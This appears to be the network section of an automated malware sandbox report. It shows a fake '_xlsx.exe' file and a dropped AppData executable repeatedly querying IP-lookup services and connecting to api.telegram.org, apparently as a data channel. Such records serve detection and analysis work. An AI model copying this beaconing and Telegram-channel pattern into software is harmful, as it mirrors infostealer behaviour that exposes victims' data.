Sep 26, 2024 09:00:48.870294094 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:48.870352030 CEST	443	49751	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:49.020363092 CEST	443	49751	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:49.020482063 CEST	443	49751	188.114.96.3	192.168.2.5
Sep 26, 2024 09:00:49.020555973 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:49.021117926 CEST	49751	443	192.168.2.5	188.114.96.3
Sep 26, 2024 09:00:49.030771017 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.030839920 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:49.031012058 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.031402111 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.031433105 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:49.669473886 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:49.669595957 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.671051025 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.671077967 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:49.671319962 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:49.672818899 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:49.715442896 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:50.285788059 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:50.285964966 CEST	443	49752	149.154.167.220	192.168.2.5
Sep 26, 2024 09:00:50.286050081 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:50.286621094 CEST	49752	443	192.168.2.5	149.154.167.220
Sep 26, 2024 09:00:51.190417051 CEST	49721	80	192.168.2.5	132.226.8.169
Sep 26, 2024 09:01:04.702052116 CEST	49750	80	192.168.2.5	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:00:04.478478909 CEST	50646	53	192.168.2.5	1.1.1.1
Sep 26, 2024 09:00:04.487953901 CEST	53	50646	1.1.1.1	192.168.2.5
Sep 26, 2024 09:00:18.715871096 CEST	58989	53	192.168.2.5	1.1.1.1
Sep 26, 2024 09:00:18.722570896 CEST	53	58989	1.1.1.1	192.168.2.5
Sep 26, 2024 09:00:35.812541962 CEST	56798	53	192.168.2.5	1.1.1.1
Sep 26, 2024 09:00:35.819540024 CEST	53	56798	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 09:00:04.478478909 CEST	192.168.2.5	1.1.1.1	0x3f62	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:18.715871096 CEST	192.168.2.5	1.1.1.1	0xfd5	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:35.812541962 CEST	192.168.2.5	1.1.1.1	0xa9a2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:04.487953901 CEST	1.1.1.1	192.168.2.5	0x3f62	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:18.722570896 CEST	1.1.1.1	192.168.2.5	0xfd5	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:18.722570896 CEST	1.1.1.1	192.168.2.5	0xfd5	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 09:00:35.819540024 CEST	1.1.1.1	192.168.2.5	0xa9a2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:04.503443956 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:18.381717920 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:18.389307022 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:18.672473907 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:19.407418013 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:19.685151100 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:07.921547890 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:20.324029922 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:21.264353037 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49721	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:21.913141966 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:23.893579960 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:24.516272068 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:26.591084957 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49725	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:27.217349052 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:28.037694931 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49727	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:28.670629978 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:29.583796978 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49728	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:29.322633982 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:31.186881065 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:31.187100887 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:31.187237024 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:31.187566996 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:31.191414118 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:31.659435987 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49730	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:31.371680975 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:33.312611103 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49732	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:32.358943939 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:34.752504110 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49734	132.226.8.169	80	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:33.958314896 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 09:00:35.181936026 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49737	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:35.380506039 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:37.207117081 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49740	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:37.994319916 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:39.521365881 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:39.522089958 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:39.522233963 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49742	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:40.143291950 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:41.103173971 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:40 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

